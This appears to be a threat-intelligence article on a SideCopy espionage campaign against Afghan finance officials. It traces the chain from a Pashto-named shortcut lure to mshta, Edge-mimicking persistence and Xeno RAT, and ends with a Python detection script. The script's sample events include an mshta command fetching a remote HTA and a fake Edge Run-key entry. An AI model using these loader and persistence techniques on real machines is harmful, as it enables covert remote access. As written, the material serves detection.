A new campaign shows how regional espionage groups keep mixing local-language social engineering with commodity remote access tools. Seqrite Labs research indicates that the Pakistan-aligned SideCopy group targeted Afghanistan's Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking government personnel in an operation tracked as XENOFISCAL.
The attack starts with a ZIP archive containing a malicious Windows shortcut file. The filename is written in Pashto, which matters because it matches the language used in Afghan government circles and suggests the group is targeting specific people rather than sending broad spam. Once someone opens it, the LNK file uses mshta.exe to pull a remote HTML Application from a compromised Afghan education domain.
The infection chain runs obfuscated JavaScript in memory, sets up registry-based persistence while pretending to be Microsoft Edge, and uses a DLL-based loader to drop Xeno RAT 1.8.7 along with a decoy document. This setup gives the attacker stealth and a distraction. The victim sees plausible content while the RAT is staged in the background.
Xeno RAT gives the operator broad post-compromise control. The malware can communicate over TCP, run external DLL modules, exfiltrate data to the command server, check installed antivirus information, support SOCKS5 tunneling, perform file operations, capture keystrokes and screenshots, monitor the clipboard, access the webcam and microphone, remove its persistence, and uninstall itself.
For defenders, the final malware family isn't the only signal. Teams watching government, finance, or diplomatic environments in the region should watch for LNK files inside archives, mshta execution from user context, HTA retrieval from unexpected education or public-sector domains, new registry persistence that mimics browsers, and suspicious TCP sessions from endpoints that recently opened lure documents.
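As an added illustration of two of those signals (not code from Seqrite's report), the script below runs simple rules over constructed Sysmon-style process and registry events: mshta.exe launched from a user-context parent with a remote URL argument, and a Run-key entry named like Edge whose binary lives outside Edge's install directory. The hostname, paths and field names are assumptions for the sample only.

```python
import re
from urllib.parse import urlparse

# Constructed sample telemetry (Sysmon-style fields); not real campaign data.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://edu-example.invalid/update.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Tools\local.hta"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "MicrosoftEdgeUpdate",
     "data": r"C:\Users\u\AppData\Roaming\msedge\msedge.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "MicrosoftEdgeAutoLaunch",
     "data": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Directory the legitimate Edge binary is installed under (assumed, lowercase).
EDGE_REAL_DIRS = ("\\microsoft\\edge\\application\\",)

def mshta_remote_hta(ev):
    """Flag mshta.exe whose command line fetches a remote HTA (http/https URL)."""
    if ev.get("type") != "process" or not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    m = URL_RE.search(ev["cmdline"])
    if not m:
        return None  # local HTA: lower concern, not flagged by this rule
    host = urlparse(m.group(0)).hostname or ""
    return {"rule": "mshta_remote_hta", "host": host, "parent": ev["parent"]}

def browser_mimic_persistence(ev):
    """Flag Run-key values named like Edge that point outside Edge's install dir."""
    if ev.get("type") != "registry" or not ev["key"].lower().endswith("\\run"):
        return None
    if "edge" not in ev["name"].lower():
        return None
    if any(d in ev["data"].lower() for d in EDGE_REAL_DIRS):
        return None  # genuine Edge binary path
    return {"rule": "browser_mimic_persistence", "name": ev["name"], "data": ev["data"]}

def detect(events):
    """Apply both rules to every event and return the list of findings."""
    findings = []
    for ev in events:
        for rule in (mshta_remote_hta, browser_mimic_persistence):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

In production these checks would be expressed in the SIEM's own rule language and joined with the archive-extraction and lure-document context the article mentions.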